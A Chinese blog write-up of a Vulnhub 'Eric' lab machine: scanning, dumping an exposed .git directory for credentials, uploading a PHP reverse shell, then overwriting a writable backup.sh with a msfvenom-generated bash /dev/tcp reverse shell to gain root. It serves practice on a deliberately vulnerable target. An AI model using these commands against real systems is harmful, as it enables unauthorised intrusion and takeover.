Eric靶机渗透测试

已于 2022-04-13 15:15:23 修改
阅读量3.2k 收藏
点赞数
分类专栏: 网安渗透测试 文章标签: 安全 网络安全 linux 安全性测试
于 2022-04-12 20:54:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52971422/article/details/124133899
版权

Eric靶机渗透练习

攻击机:kali

Ip:192.168.0.3

靶机:eric

Ip:192.168.0.4

找到靶机ip:192.168.0.4

nmap -sF 192.168.0.0/24

细致的扫描靶机,发现80端口的网站有.git敏感目录,但是不急。

nmap -sV -A -p- 192.168.0.4 -T4

对网站细致的目录枚举

dirb http://192.168.0.4/

发现有三个敏感目录

一个个好好康康嘿嘿

先admin.php,有给登录界面

(但是经过本人尝试没有发现注入点,可能本人太猪了没有发现)

那在去看看/upload/,发现没有访问权限,寄

那只能尝试用.git泄漏敏感密码漏洞了

这里有很多方法(GitToolsgithack

这里用GitTools方法

下载GitTools方法:git clone http://github.com/internetwache/GitTools.git

Cd GitTools/ Dumper

用gitdumper.sh将源码下载到当前目录的demo目录下

./gitdumper.sh http://192.168.0.4/.git/ demo

进入GitTools的Extractor里执行extractor.sh提取demo里的源码

./extractor.sh ../Dumper/demo/ demo1

康康提取出来的东西

在admin.php里发现账号和密码,想想这个用户和密码有什么有?

(回到上面找到的敏感目录admin.php)

发现是个可以上传文件的后台网站

这样就可以上传shell.php来反弹shell

这里可以使用kali自带的反弹shell

cp /usr/share/webshells/php/php-reverse-shell.php /

(记得修改ip和post)

随便改个名字

直接上传上去

上传成功后

记得开监听

Nv -nlvp 1234

上传的文件路径为: /upload/demo.php

万事俱备了,直接访问http://192.168.0.4/upload/demo.php,在kali中获取到shell

进去后直接奔flag去,进入home/eric,发现有个flag.txt而且要root来提权

并且还发现有个backup.sh,配置权限有问题,可以用metasploit生成写入提取脚本

生成脚本:msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.3 lport=1145 A

然后直接写入脚本

Echo “0<&115-;exec 115<>/dev/tcp/192.168.0.3/1145;sh <&115 >&115 2>&115” > backup.sh

然后开始监听

直接运行backup.sh,成功提权咯!

直接可以去查看flag.txt文件了

收工!

topxiop
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Eric靶机渗透测试通关全教程
WuYan_Emperor的博客
07-29 2532
Eric靶机渗透测试通关全教程,拿到普通用户下的`flag`, 拿到`root`用户下的`flag`
SP eric靶机通关攻略
systemino的博客
04-30 805
大家好,今天给大家带来的靶机是SP eric,这个靶机有两个flag,我们的目标就是把它们都找出来,flag的位置已经提供,如下: ·/root/flag.txt ·/root/eric/flag.txt 靶机下载地址:https://www.vulnhub.com/entry/sp-eric,274/ 渗透方法 ·网络扫描 ·访问HTTP服务端口 ·使用dirb遍历目录 ...
靶机渗透】eric靶机通关练习
serendipity1130的博客
08-30 434
1.扫描存活主机ip: sudo arp-scan -l netdiscover -r 192.168.225.133 -i eth0 2.探测开放端口: nmap 192.168.225.138 -sV -sC -Pn -n -v -T5 -p- 看到开放了80和22端口,同时扫描到他的git源码泄露 首先,先访问一下80端口,发现没有什么信息量 3.扫目录,扫出admin.php(访问发现是个登录界面),upload(说明可以上传),robots.txt(应该有信息) 3.
CTF学习-eric靶机练习:使用git tools获取敏感目录,提权
一根火柴博客
01-28 726
Kali渗透测试-靶场练习eric 实验: Kali的IP:192.168.1.11(不同的机器配置不同) 靶机IP: 192.168.1.6(动态ip) 操作步骤 靶机下载: https://www.vulnhub.com/entry/sp-eric%2C274 下载的7z压缩包,解压后为eric.ova,还原靶机,这里我开始使用vmware还原,失败,我又安装的Virtual Box,还...
Linux-Ubuntu系列】Ubuntu18.04安装Docker搭建靶机
CrisimpleHome
12-31 1479
Ubuntu18.04安装Docker搭建靶机 一.配置Docker基础运行环境 1.安装python3版本及对应的pip3 # 一般Ubuntu发行版本都会默认自带python的两个版本python2和python3 sudo apt-get install python3 # 查询当前python的版本 python3 -V # 安装python3对应的pip3安装工具 sudo apt in...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
docker学习笔记5【实战:将ctfweb题环境docker打包供他人使用】
Sp4rkW的博客
01-05 8504
置顶,一个很不错的wiki,点这里 历时三天,玩坏三个虚拟机,云服务器重置一次,终于算是docker入门了,回想起来其实还是linux的一些操作不太熟导致的各种报错,其实还是比较简单的,下面用实战从零来总结一下docker的用法: 1、vmvare安装ubuntu16.04虚拟机 略,教程很多,镜像推荐去官网下载,被不好的镜像坑过 2、更新ubuntu源为国内源 略,同上,百度攻略很...
vunhub 靶机之旅-1
ashen的博客
12-08 964
youtube视频: https://www.youtube.com/watch?v=SerBliNAh1k nmap -A 同时打开操作系统指纹和版本检测 wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户 Examples : 帮助 -Further help … ruby ./wpscan.rb --help 做“非侵入性”检查 -Do ‘...
vulnhub——ha:wordy靶机
Re1_zf的博客
10-23 545
利用连接靶机shell使用wget从攻击机上下载构造好的passwd文件来覆盖靶机上的passwd文件。先在kali攻击机的web目录下创建一个passwd文件,内容为靶机的etc/passwd文件的内容。dirb直接扫描一下,可以了解到这是一个wordpress的站。有的时候还能直接发现一些关键的有用信息,不过这次没有发现。扫描出来的插件拿去msf搜索一下有没有可以利用的漏洞。没有什么可以利用的东西,就是初始的apache的首页。这里搜索到一个可以利用的这个插件的文件上传漏洞。
【HTB系列】靶机Teacher渗透测试详解
大方子
04-27 1331
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
CTF4靶机训练
weixin_44132032的博客
08-19 3926
CTF4靶机训练环境下载主机发现端口扫描漏洞挖掘SSH利用权限提升 环境下载 链接:https://pan.baidu.com/s/1Kb4RKtnZ5RD43FAnjlYlsg 提取码:d59k Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp -A -sS -sV -p- 目标主机IP 扫描得出目...
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6658
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
线下靶机测试:hacknox-1
weixin_57567689的博客
08-30 570
对线下靶机进行测试
无数据完成kaldi_lre07实验
Relaxed_one的博客
06-13 2262
kaldi/egs/lre07/v1/实验所需要的数据都是不开源,需要购买,所以在第一次做这个实验的时候,我是完全用自己的数据去摸索的。过程中踩了很多坑,记录一下。首先需要将cmd.sh 中的queue.pl改成run.pl,并且将run.sh中训练数据准备的命令只保留local/make_sre_2008_train.pl $data_root/LDC2011S05 data。实验过程用的数据均...
靶机-BTRSys 2.1 Walkthrough
banacyo14206的博客
08-22 636
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
metasploit靶机渗透测试
最新发布
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值